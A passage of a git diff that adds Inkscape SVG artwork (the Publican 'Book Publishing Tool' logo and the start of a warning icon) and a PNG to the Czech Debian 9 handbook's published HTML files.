+       gradientTransform="translate(-58.623593,-52.746766)" />
+    <linearGradient
+       x1="282.13562"
+       y1="198.85522"
+       x2="282.13562"
+       y2="220.4299"
+       id="linearGradient6356"
+       xlink:href="#linearGradient3218"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="translate(-58.623593,-49.548418)" />
+    <filter
+       color-interpolation-filters="sRGB"
+       id="filter6426">
+      <feGaussianBlur
+         stdDeviation="1.3718847"
+         id="feGaussianBlur6428" />
+    </filter>
+    <linearGradient
+       x1="313.12421"
+       y1="234.06723"
+       x2="300.74551"
+       y2="252.48558"
+       id="linearGradient6436"
+       xlink:href="#linearGradient6430"
+       gradientUnits="userSpaceOnUse" />
+    <filter
+       x="-0.049464952"
+       y="-0.10498104"
+       width="1.0989299"
+       height="1.2099621"
+       color-interpolation-filters="sRGB"
+       id="filter6542">
+      <feGaussianBlur
+         stdDeviation="2.6872547"
+         id="feGaussianBlur6544" />
+    </filter>
+    <filter
+       color-interpolation-filters="sRGB"
+       id="filter6596">
+      <feGaussianBlur
+         stdDeviation="1.7274814"
+         id="feGaussianBlur6598" />
+    </filter>
+    <linearGradient
+       x1="180"
+       y1="163.62605"
+       x2="180"
+       y2="66.188019"
+       id="linearGradient6600"
+       xlink:href="#linearGradient3218"
+       gradientUnits="userSpaceOnUse" />
+    <filter
+       color-interpolation-filters="sRGB"
+       id="filter6626">
+      <feBlend
+         in2="BackgroundImage"
+         mode="multiply"
+         id="feBlend6628" />
+    </filter>
+  </defs>
+  <path
+     d="m 192.86534,56.061481 c -0.50361,-0.05952 -15.81743,15.539777 -22.98246,22.59399 6.39469,-2.022962 17.37512,-5.797322 18.87496,-5.619699 1.50061,0.17761 10.05669,6.287721 15.14374,9.668178 -3.44524,-8.295783 -10.53195,-26.582844 -11.03624,-26.642469 z m 63.7003,19.617933 c -0.36861,-0.209237 -30.19021,6.665429 -43.89415,9.694631 7.65259,0.542544 21.08672,1.231768 22.18456,1.854212 1.09971,0.623611 1.92541,8.064764 2.67487,12.283088 5.91959,-7.418443 19.40383,-23.62268 19.03472,-23.831931 z M 125.42293,59.592937 c -0.44655,0.1125 4.65988,18.477033 6.76635,26.856382 2.69189,-3.815347 6.93512,-10.632649 8.26418,-10.967772 1.33082,-0.335537 14.41073,2.134145 21.88974,3.381693 -11.49464,-6.001218 -36.47343,-19.382928 -36.92027,-19.270303 z m 164.80534,51.680193 c -0.0928,-0.27855 -33.04307,-4.73423 -48.04185,-6.88709 5.99277,2.90065 16.78887,7.80145 17.06501,8.63065 0.27649,0.83069 -6.98832,6.74108 -10.86175,10.18944 13.01804,-3.70914 41.93138,-11.65403 41.83859,-11.933 z M 125.48113,90.005528 C 110.30347,88.587271 77.076206,85.20923 76.857612,85.45104 c -0.218602,0.241871 23.348278,14.363657 33.917068,20.87246 -2.03696,-4.14784 -6.10707,-11.394242 -5.45553,-12.114888 0.65021,-0.719302 13.13762,-2.842685 20.16198,-4.203084 z m 121.66254,38.409332 c 2.03703,4.14807 6.10691,11.39426 5.45552,12.11488 -0.65033,0.7193 -13.13757,2.84269 -20.1619,4.20306 15.17775,1.41825 48.40491,4.79631 48.62348,4.5545 0.21866,-0.24186 -23.3483,-14.36365 -33.9171,-20.87244 z M 107.57689,111.87714 c -13.017795,3.70908 -41.931322,11.654 -41.838422,11.93314 0.09271,0.27847 33.043041,4.73405 48.041762,6.88692 -5.9926,-2.90067 -16.788896,-7.80154 -17.064854,-8.63067 -0.276569,-0.83079 6.988304,-6.74109 10.861514,-10.18939 z M 225.72916,148.289 c -2.69194,3.81535 -6.93504,10.63266 -8.26422,10.9678 -1.33087,0.33555 -14.41072,-2.13415 -21.88976,-3.38169 11.49463,6.00121 36.47352,19.38299 36.92049,19.27028 0.44622,-0.11245 -4.66012,-18.477 -6.76651,-26.85639 z M 118.43579,135.57189 c -5.91956,7.41845 -19.403773,23.62269 -19.034599,23.83193 0.36839,0.20917 30.190049,-6.66543 43.894159,-9.69464 -7.65284,-0.54256 -21.08673,-1.23178 -22.1848,-1.85426 -1.09959,-0.62357 -1.92533,-8.06468 -2.67476,-12.28303 z m 67.64804,20.85589 c -6.39469,2.02298 -17.37508,5.79732 -18.87493,5.61969 -1.50044,-0.17764 -10.05685,-6.28769 -15.14375,-9.66826 3.44522,8.29578 10.53209,26.58297 11.03633,26.64251 0.50342,0.0594 15.81741,-15.53967 22.98235,-22.59394 z"
+     transform="matrix(1,0,0,1.0406634,-58.623593,-54.026411)"
+     id="path6546"
+     style="opacity:0.35096154;fill:url(#linearGradient6600);fill-opacity:1;filter:url(#filter6596)" />
+  <path
+     d="m 134.24175,3.3147155 c -0.50361,-0.05952 -15.81743,15.5397765 -22.98246,22.5939895 6.39469,-2.022962 17.37512,-5.797322 18.87496,-5.619699 1.50061,0.17761 10.05669,6.287721 15.14374,9.668178 C 141.83275,21.661401 134.74604,3.3743405 134.24175,3.3147155 z m 63.7003,19.6179325 c -0.36861,-0.209237 -30.19021,6.665429 -43.89415,9.694631 7.65259,0.542544 21.08672,1.231768 22.18456,1.854212 1.09971,0.623611 1.92541,8.064764 2.67487,12.283088 5.91959,-7.418443 19.40383,-23.62268 19.03472,-23.831931 z M 66.799337,6.8461715 c -0.44655,0.1125 4.65988,18.4770325 6.76635,26.8563815 2.69189,-3.815347 6.93512,-10.632649 8.26418,-10.967772 1.33082,-0.335537 14.41073,2.134145 21.889743,3.381693 C 92.224967,20.115256 67.246177,6.7335465 66.799337,6.8461715 z M 231.60468,58.526364 c -0.0928,-0.27855 -33.04307,-4.73423 -48.04185,-6.88709 5.99277,2.90065 16.78887,7.80145 17.06501,8.63065 0.27649,0.83069 -6.98832,6.74108 -10.86175,10.18944 13.01804,-3.70914 41.93138,-11.65403 41.83859,-11.933 z M 66.857537,37.258762 c -15.17766,-1.418257 -48.404924,-4.796298 -48.623518,-4.554488 -0.218602,0.241871 23.348278,14.363657 33.917068,20.87246 -2.03696,-4.14784 -6.10707,-11.394242 -5.45553,-12.114888 0.65021,-0.719302 13.13762,-2.842685 20.16198,-4.203084 z M 188.52008,75.668094 c 2.03703,4.14807 6.10691,11.39426 5.45552,12.11488 -0.65033,0.7193 -13.13757,2.84269 -20.1619,4.20306 15.17775,1.41825 48.40491,4.79631 48.62348,4.5545 0.21866,-0.24186 -23.3483,-14.36365 -33.9171,-20.87244 z M 48.953297,59.130374 c -13.017795,3.70908 -41.9313217,11.654 -41.8384217,11.93314 0.09271,0.27847 33.0430407,4.73405 48.0417617,6.88692 -5.9926,-2.90067 -16.788896,-7.80154 -17.064854,-8.63067 -0.276569,-0.83079 6.988304,-6.74109 10.861514,-10.18939 z m 118.152273,36.41186 c -2.69194,3.81535 -6.93504,10.632656 -8.26422,10.967796 -1.33087,0.33555 -14.41072,-2.13415 -21.88976,-3.38169 11.49463,6.00121 36.47352,19.38299 36.92049,19.27028 0.44622,-0.11245 -4.66012,-18.477 -6.76651,-26.856386 z M 59.812197,82.825124 c -5.91956,7.41845 -19.403773,23.622686 -19.034599,23.831926 0.36839,0.20917 30.190049,-6.665426 43.894159,-9.694636 -7.65284,-0.54256 -21.08673,-1.23178 -22.1848,-1.85426 -1.09959,-0.62357 -1.92533,-8.06468 -2.67476,-12.28303 z m 67.648043,20.855886 c -6.39469,2.02298 -17.37508,5.79732 -18.87493,5.61969 -1.50044,-0.17764 -10.056853,-6.28769 -15.143753,-9.668256 3.44522,8.295776 10.532093,26.582966 11.036333,26.642506 0.50342,0.0594 15.81741,-15.53967 22.98235,-22.59394 z"
+     id="path3766"
+     style="fill:url(#linearGradient3216);fill-opacity:1" />
+  <g
+     transform="matrix(1.2433595,-0.05648069,-0.00851864,1.1425318,-114.05679,-272.08226)"
+     id="g3512"
+     style="enable-background:new">
+    <g
+       transform="matrix(0.7599177,-0.01192692,0,0.7500728,246.58115,378.18196)"
+       id="g3514">
+      <g
+         transform="matrix(2.8294915,-0.5196682,1.922722,2.7658074,-1390.7458,-622.14861)"
+         id="g3516">
+        <path
+           d="m 191.25,92.09375 c -0.20592,0.0097 -0.4015,0.01903 -0.59375,0.0625 L 129.21875,107.4375 114.875,97.78125 114.75,111.625 c -0.0268,3.59859 -0.0786,5.26638 1.90625,6.5625 l 50.3125,34.09375 c 0.1414,0.11519 0.2923,0.21282 0.4375,0.3125 0.30609,0.21013 0.63149,0.39638 0.96875,0.53125 0.0608,0.0243 0.12527,0.0408 0.1875,0.0625 0.85167,0.32374 1.78133,0.42664 2.5625,0.25 l 72.53125,-16.5 c 0.76901,-0.17389 1.24307,-0.58588 1.40625,-1.125 0.16316,-0.53911 0.0189,-1.22272 -0.5,-1.875 l -49.25,-40.03125 c -0.51896,-0.652313 -1.31584,-1.187828 -2.15625,-1.5 -0.63032,-0.23411 -1.28848,-0.341522 -1.90625,-0.3125 z"
+           transform="matrix(0.3165905,0.08474257,-0.2518713,0.3747611,270.47662,187.97058)"
+           id="path5539"
+           style="opacity:0.5;fill:#000000;fill-opacity:1;filter:url(#filter6542)" />
+        <path
+           d="m 281.53626,237.15326 27.51166,-0.60706 c 0.28726,0 0.54652,0.1161 0.73397,0.3043 0.18744,0.18821 0.30307,0.44853 0.30307,0.73697 l 5.50607,19.18448 c 0,0.28843 -0.11563,0.54874 -0.30307,0.73695 -0.18745,0.18821 -0.44671,0.30432 -0.73397,0.30432 l -27.12774,0.0421 c -0.57451,0 -1.03703,-0.46441 -1.03703,-1.04127 l -5.88999,-18.61951 c 0,-0.57687 0.46252,-1.04127 1.03703,-1.04127 z"
+           id="path3518"
+           style="fill:#8d0000;fill-opacity:1" />
+        <path
+           d="m 293.04884,250.57475 24.09263,-0.46052 c -2.06778,1.70244 -3.74217,4.07456 -3.72168,6.23725 l -24.60495,0.081 c -2.80034,-0.14106 1.92301,-6.21234 4.234,-5.85776 z"
+           id="path3520"
+           style="fill:url(#linearGradient3605);fill-opacity:1" />
+        <g
+           transform="matrix(0.4446532,0.0482263,-0.1333755,0.1962764,116.26445,175.89592)"
+           id="g3522">
+          <path
+             d="m 473.62579,276.25731 49.99465,-12.3175"
+             id="path3524"
+             style="fill:none;stroke:url(#linearGradient3607);stroke-width:0.731525;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" />
+          <path
+             d="M 473.62579,279.2625 523.62044,266.945"
+             id="path3526"
+             style="fill:none;stroke:url(#linearGradient3609);stroke-width:0.731525;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" />
+          <path
+             d="m 473.62579,282.26769 49.99465,-12.3175"
+             id="path3528"
+             style="fill:none;stroke:url(#linearGradient3611);stroke-width:0.731525;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" />
+          <path
+             d="m 473.62579,285.27287 49.99465,-12.3175"
+             id="path3530"
+             style="fill:none;stroke:url(#linearGradient3613);stroke-width:0.731525;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" />
+        </g>
+        <path
+           d="m 297.97117,252.53831 c 3.55435,7.23743 1.84248,10.21442 1.84248,10.21442 2.34309,-1.31419 3.98813,-2.90075 4.59366,-4.89297 1.69632,2.05733 3.28001,4.14745 6.61694,5.72721 0,0 -2.85323,-6.91061 -4.0263,-10.8615 l -9.02678,-0.18716 z"
+           id="path3532"
+           style="fill:#0093d9;fill-opacity:1;stroke-width:2" />
+        <path
+           d="m 284.57789,231.78049 26.77592,0.20008 c 0.68561,0 1.23756,0.55195 1.23756,1.23755 l 7.06718,15.78748 c 0,0.6856 -0.55195,1.23755 -1.23756,1.23755 l -27.04539,-0.34183 -8.03527,-16.88328 c 0,-0.6856 0.55195,-1.23755 1.23756,-1.23755 z"
+           id="path3534"
+           style="fill:url(#linearGradient6436);fill-opacity:1" />
+        <path
+           d="m 280.11847,237.40712 3.52338,-5.17553 7.74436,17.75537 c -3.36741,1.31622 -7.06065,7.43359 -3.57281,7.85099 -0.90727,0.0228 -1.25561,-0.2564 -1.40216,-0.76942 l -7.33593,-17.04682 c -0.30195,-0.65394 0.12828,-1.26825 1.04316,-2.61459 z"
+           id="path3536"
+           style="fill:#bc0000;fill-opacity:1" />
+        <path
+           d="m 284.81403,231.70142 25.95424,-0.0282 c 0.46998,0 0.84832,0.37836 0.84832,0.84833 0.22453,6.59441 -14.1341,15.47802 -20.88485,16.08864 l -6.76604,-16.0604 c 0,-0.46997 0.37835,-0.84833 0.84833,-0.84833 z"
+           id="path3538"
+           style="fill:url(#radialGradient3615);fill-opacity:1" />
+        <path
+           d="m 300.57764,261.77315 c 2.52506,-1.48438 3.39499,-3.74367 3.94533,-5.4168 0.129,2.75802 6.15463,7.38876 5.50424,5.77641 -2.09513,-5.19394 -2.45794,-8.70017 -3.21244,-8.8903 -1.09621,-0.27623 -6.29411,-0.14168 -7.77351,-0.22359 1.0853,2.18428 1.8036,4.4636 1.53638,8.75428 z"
+           id="path3540"
+           style="opacity:0.79901961;fill:url(#radialGradient3617);fill-opacity:1;stroke-width:2" />
+        <path
+           d="m 319.47279,249.25686 c 0,0.6856 -0.36012,0.98755 -1.04573,0.98755 l -26.46288,0.44824 -0.60592,-0.84306 c 7.14032,-0.21334 18.76088,-0.20836 28.11453,-0.59273 z"
+           id="path3542"
+           style="fill:#a70000;fill-opacity:1" />
+      </g>
+    </g>
+  </g>
+  <path
+     d="m 14.400303,150.8796 3.34996,0 c 2.70348,0 5.3482,-0.23509 7.52274,-0.76403 4.52538,-1.17543 9.69726,-4.34909 9.69726,-11.69549 0,-4.46662 -1.93945,-7.52274 -4.58416,-9.16833 -2.82102,-1.76314 -6.58239,-2.35086 -10.69638,-2.35086 l -16.3971997,0 0,1.70437 c 5.17187,0.35263 5.28942,0.47018 5.28942,3.76137 l 0,30.4454 c 0,3.29119 -0.11755,3.40874 -5.28942,3.76137 l 0,1.70437 17.3375397,0 0,-1.70437 c -6.05344,-0.35263 -6.22976,-0.47018 -6.22976,-3.76137 l 0,-11.93243 m 0,-19.74717 c 0,-1.6456 0.64649,-2.17454 4.46662,-2.17454 6.05344,0 9.75604,3.46752 9.75604,9.87358 0,7.34641 -4.81925,9.99113 -9.87358,9.99113 -3.46751,0 -4.34908,-0.11754 -4.34908,-2.29208 l 0,-15.39809 m 58.765624,36.43823 0,-1.70437 c -4.05522,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-24.03747 -0.4114,-0.35263 -9.2271,1.46928 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,13.22355 c 0,1.6456 -0.17631,2.93857 -0.47017,3.52628 -1.35174,2.70348 -4.17276,4.40785 -7.22887,4.40785 -3.40874,0 -5.93591,-2.11577 -5.93591,-6.69993 l 0,-19.98225 -0.4114,-0.35263 -9.227094,1.46928 0,1.46928 2.233314,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,15.51563 c 0,6.7587 3.99645,8.8157 8.34553,8.8157 4.99556,0 9.05079,-3.40874 10.75515,-4.23153 l 0.58772,3.52628 9.40341,0 m 9.15435,0.70525 2.35085,-2.29208 c 2.05699,1.17543 4.5254,2.29208 8.93324,2.29208 7.816583,0 14.634063,-3.76138 14.634063,-15.75072 0,-3.64381 -0.76403,-14.45774 -11.342863,-14.45774 -4.46662,0 -7.93414,2.87979 -10.10867,4.17276 l 0,-17.92525 -0.4114,-0.35263 -9.2271,1.46928 0,1.46928 2.23331,0.23509 c 1.52805,0.17631 1.88068,0.47017 1.88068,2.70348 l 0,37.96628 1.05789,0.47017 m 4.46662,-19.57085 c 0,-1.46928 0.11754,-2.40963 0.58771,-3.34997 1.41051,-2.82102 3.87891,-4.11399 7.1701,-4.11399 2.40962,0 7.581513,1.41052 7.581513,11.63672 0,8.63938 -2.644723,13.3411 -8.463083,13.3411 -3.11487,0 -5.40696,-1.58683 -6.46484,-4.5254 -0.35263,-1.05788 -0.4114,-2.29208 -0.4114,-3.70259 l 0,-9.28587 m 37.375603,-24.3901 -0.4114,-0.35263 -9.22709,1.46928 0,1.46928 2.2333,0.23509 c 1.52806,0.17631 1.88069,0.47017 1.88069,2.70348 l 0,32.61809 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.3402,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-38.14259 m 9.43811,15.22177 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,18.51297 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17277,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-24.03747 -0.41141,-0.35263 -9.22709,1.46928 m 6.81747,-13.98758 c -2.11576,0 -3.58505,1.52806 -3.58505,3.64383 0,2.05699 1.46929,3.52628 3.58505,3.52628 2.17454,0 3.52628,-1.46929 3.58505,-3.52628 0,-2.11577 -1.41051,-3.64383 -3.58505,-3.64383 m 27.69946,39.67065 c -6.99378,0 -8.63939,-7.28765 -8.63939,-12.81215 0,-8.75692 3.46752,-12.28321 7.52274,-12.28321 2.70347,0 4.40785,1.93946 5.58327,5.11311 0.35263,0.94034 0.70526,1.52805 1.82191,1.52805 1.17543,0 3.46751,-0.76403 3.46751,-2.99733 0,-2.70348 -3.87891,-5.70082 -10.22621,-5.70082 -10.69637,0 -14.28143,7.58151 -14.28143,15.39809 0,9.8148 4.81925,14.81037 13.63495,14.81037 4.11398,0 9.6385,-2.17454 11.28409,-8.46307 l -1.70437,-0.8228 c -1.82191,4.11399 -4.17277,6.22976 -8.46307,6.22976 m 33.63996,-6.05344 c 0,4.76047 -3.64382,5.99467 -5.9359,5.99467 -3.64382,0 -5.40697,-2.58594 -5.40697,-6.05345 0,-2.76225 1.29298,-4.17276 4.58417,-5.40696 2.35085,-0.88157 5.46573,-1.99822 6.7587,-2.82102 l 0,8.28676 m 5.28942,-13.28233 c 0,-3.40873 -0.76404,-7.81658 -9.6385,-7.81658 -6.64115,0 -11.87181,3.46751 -11.87181,6.69993 0,1.88068 2.17454,2.76225 3.2912,2.76225 1.23419,0 1.58682,-0.64648 1.88068,-1.6456 1.29297,-4.34907 3.7026,-5.75959 6.05345,-5.75959 2.29208,0 4.99556,1.17544 4.99556,5.87714 l 0,2.46839 c -1.46928,1.52806 -7.17011,2.99734 -11.81304,4.46662 -4.23153,1.29297 -5.46573,4.23154 -5.46573,6.99379 0,4.40785 2.93857,8.34553 8.46307,8.34553 3.64382,-0.11754 6.87625,-2.29208 8.75693,-3.52628 0.8228,2.17454 1.76314,3.52628 3.82014,3.52628 2.17453,0 4.7017,-0.64648 6.93501,-1.76314 l -0.35262,-1.41051 c -0.8228,0.17631 -2.11577,0.29386 -2.99734,0.0588 -1.05789,-0.23508 -2.057,-1.35174 -2.057,-5.05433 l 0,-14.22267 m 38.36187,1.52806 c 0,-5.9359 -3.23243,-9.34464 -8.63939,-9.34464 -4.34907,0 -7.05256,2.11577 -10.69638,4.46662 l -0.8228,-4.46662 -8.75693,1.46928 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,18.51297 c 0,2.99733 -0.17631,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-13.75249 c 0,-1.46928 0.11754,-2.29208 0.58771,-3.23243 1.2342,-2.29207 3.87891,-4.23153 6.99379,-4.23153 3.99645,0 6.17099,2.23331 6.17099,7.34642 l 0,13.87003 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-15.04546"
+     id="text2427"
+     style="font-size:58.77133179px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;line-height:125%;writing-mode:lr-tb;text-anchor:start;fill:url(#linearGradient3224);fill-opacity:1;stroke:none;font-family:Utopia;-inkscape-font-specification:Utopia" />
+  <text
+     x="213.01947"
+     y="195.03021"
+     id="text2432"
+     xml:space="preserve"
+     style="font-size:13.46161938px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:end;line-height:125%;writing-mode:lr-tb;text-anchor:end;fill:#888a85;fill-opacity:1;stroke:none;font-family:Liberation Sans;-inkscape-font-specification:Liberation Sans"><tspan
+       x="213.01947"
+       y="195.03021"
+       id="tspan2434"
+       style="font-size:13.46161938px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:end;line-height:125%;letter-spacing:0.44818318;writing-mode:lr-tb;text-anchor:end;fill:#888a85;font-family:Liberation Sans;-inkscape-font-specification:Liberation Sans">BOOK PUBLISHING TOOL</tspan></text>
+  <path
+     d="m 14.400303,154.07795 3.34996,0 c 2.70348,0 5.3482,-0.23509 7.52274,-0.76403 4.52538,-1.17543 9.69726,-4.34909 9.69726,-11.69549 0,-4.46662 -1.93945,-7.52274 -4.58416,-9.16833 -2.82102,-1.76314 -6.58239,-2.35086 -10.69638,-2.35086 l -16.3971997,0 0,1.70437 c 5.17187,0.35263 5.28942,0.47018 5.28942,3.76137 l 0,30.4454 c 0,3.29119 -0.11755,3.40874 -5.28942,3.76137 l 0,1.70437 17.3375397,0 0,-1.70437 c -6.05344,-0.35263 -6.22976,-0.47018 -6.22976,-3.76137 l 0,-11.93243 m 0,-19.74717 c 0,-1.6456 0.64649,-2.17454 4.46662,-2.17454 6.05344,0 9.75604,3.46752 9.75604,9.87358 0,7.34641 -4.81925,9.99113 -9.87358,9.99113 -3.46751,0 -4.34908,-0.11754 -4.34908,-2.29208 l 0,-15.39809 m 58.765624,36.43823 0,-1.70437 c -4.05522,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-24.03747 -0.4114,-0.35263 -9.2271,1.46928 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,13.22355 c 0,1.6456 -0.17631,2.93857 -0.47017,3.52628 -1.35174,2.70348 -4.17276,4.40785 -7.22887,4.40785 -3.40874,0 -5.93591,-2.11577 -5.93591,-6.69993 l 0,-19.98225 -0.4114,-0.35263 -9.227094,1.46928 0,1.46928 2.233314,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,15.51563 c 0,6.7587 3.99645,8.8157 8.34553,8.8157 4.99556,0 9.05079,-3.40874 10.75515,-4.23153 l 0.58772,3.52628 9.40341,0 m 9.15435,0.70525 2.35085,-2.29208 c 2.05699,1.17543 4.5254,2.29208 8.93324,2.29208 7.816583,0 14.634063,-3.76138 14.634063,-15.75072 0,-3.64381 -0.76403,-14.45774 -11.342863,-14.45774 -4.46662,0 -7.93414,2.87979 -10.10867,4.17276 l 0,-17.92525 -0.4114,-0.35263 -9.2271,1.46928 0,1.46928 2.23331,0.23509 c 1.52805,0.17631 1.88068,0.47017 1.88068,2.70348 l 0,37.96628 1.05789,0.47017 m 4.46662,-19.57085 c 0,-1.46928 0.11754,-2.40963 0.58771,-3.34997 1.41051,-2.82102 3.87891,-4.11399 7.1701,-4.11399 2.40962,0 7.581513,1.41052 7.581513,11.63672 0,8.63938 -2.644723,13.3411 -8.463083,13.3411 -3.11487,0 -5.40696,-1.58683 -6.46484,-4.5254 -0.35263,-1.05788 -0.4114,-2.29208 -0.4114,-3.70259 l 0,-9.28587 m 37.375603,-24.3901 -0.4114,-0.35263 -9.22709,1.46928 0,1.46928 2.2333,0.23509 c 1.52806,0.17631 1.88069,0.47017 1.88069,2.70348 l 0,32.61809 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.3402,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-38.14259 m 9.43811,15.22177 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,18.51297 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17277,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-24.03747 -0.41141,-0.35263 -9.22709,1.46928 m 6.81747,-13.98758 c -2.11576,0 -3.58505,1.52806 -3.58505,3.64383 0,2.05699 1.46929,3.52628 3.58505,3.52628 2.17454,0 3.52628,-1.46929 3.58505,-3.52628 0,-2.11577 -1.41051,-3.64383 -3.58505,-3.64383 m 27.69946,39.67065 c -6.99378,0 -8.63939,-7.28765 -8.63939,-12.81215 0,-8.75692 3.46752,-12.28321 7.52274,-12.28321 2.70347,0 4.40785,1.93946 5.58327,5.11311 0.35263,0.94034 0.70526,1.52805 1.82191,1.52805 1.17543,0 3.46751,-0.76403 3.46751,-2.99733 0,-2.70348 -3.87891,-5.70082 -10.22621,-5.70082 -10.69637,0 -14.28143,7.58151 -14.28143,15.39809 0,9.8148 4.81925,14.81037 13.63495,14.81037 4.11398,0 9.6385,-2.17454 11.28409,-8.46307 l -1.70437,-0.8228 c -1.82191,4.11399 -4.17277,6.22976 -8.46307,6.22976 m 33.63996,-6.05344 c 0,4.76047 -3.64382,5.99467 -5.9359,5.99467 -3.64382,0 -5.40697,-2.58594 -5.40697,-6.05345 0,-2.76225 1.29298,-4.17276 4.58417,-5.40696 2.35085,-0.88157 5.46573,-1.99822 6.7587,-2.82102 l 0,8.28676 m 5.28942,-13.28233 c 0,-3.40873 -0.76404,-7.81658 -9.6385,-7.81658 -6.64115,0 -11.87181,3.46751 -11.87181,6.69993 0,1.88068 2.17454,2.76225 3.2912,2.76225 1.23419,0 1.58682,-0.64648 1.88068,-1.6456 1.29297,-4.34907 3.7026,-5.75959 6.05345,-5.75959 2.29208,0 4.99556,1.17544 4.99556,5.87714 l 0,2.46839 c -1.46928,1.52806 -7.17011,2.99734 -11.81304,4.46662 -4.23153,1.29297 -5.46573,4.23154 -5.46573,6.99379 0,4.40785 2.93857,8.34553 8.46307,8.34553 3.64382,-0.11754 6.87625,-2.29208 8.75693,-3.52628 0.8228,2.17454 1.76314,3.52628 3.82014,3.52628 2.17453,0 4.7017,-0.64648 6.93501,-1.76314 l -0.35262,-1.41051 c -0.8228,0.17631 -2.11577,0.29386 -2.99734,0.0588 -1.05789,-0.23508 -2.057,-1.35174 -2.057,-5.05433 l 0,-14.22267 m 38.36187,1.52806 c 0,-5.9359 -3.23243,-9.34464 -8.63939,-9.34464 -4.34907,0 -7.05256,2.11577 -10.69638,4.46662 l -0.8228,-4.46662 -8.75693,1.46928 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,18.51297 c 0,2.99733 -0.17631,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-13.75249 c 0,-1.46928 0.11754,-2.29208 0.58771,-3.23243 1.2342,-2.29207 3.87891,-4.23153 6.99379,-4.23153 3.99645,0 6.17099,2.23331 6.17099,7.34642 l 0,13.87003 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-15.04546"
+     id="path6354"
+     style="font-size:58.77133179px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;line-height:125%;writing-mode:lr-tb;text-anchor:start;opacity:0.49038463;fill:url(#linearGradient6356);fill-opacity:1;stroke:none;filter:url(#filter6426);font-family:Utopia;-inkscape-font-specification:Utopia" />
+  <g
+     transform="translate(-58.623593,-52.746766)"
+     id="layer1" />
+  <g
+     transform="translate(-58.623593,-52.746766)"
+     id="layer2"
+     style="filter:url(#filter6626)" />
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/warning.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/warning.png
new file mode 100644
index 000000000..94b69d1ff
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/warning.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/warning.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/warning.svg
new file mode 100644
index 000000000..4231e5ac0
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/warning.svg
@@ -0,0 +1,130 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+<svg
+   xmlns:dc="http://purl.org/dc/elements/1.1/"
+   xmlns:cc="http://creativecommons.org/ns#"
+   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   xmlns:xlink="http://www.w3.org/1999/xlink"
+   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
+   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
+   version="1.0"
+   width="48"
+   height="48"
+   id="svg5921"
+   sodipodi:version="0.32"
+   inkscape:version="0.46"
+   sodipodi:docname="warning.svg"
+   inkscape:output_extension="org.inkscape.output.svg.inkscape">
+  <metadata
+     id="metadata11">
+    <rdf:RDF>
+      <cc:Work
+         rdf:about="">
+        <dc:format>image/svg+xml</dc:format>
+        <dc:type
+           rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
+      </cc:Work>
+    </rdf:RDF>
+  </metadata>
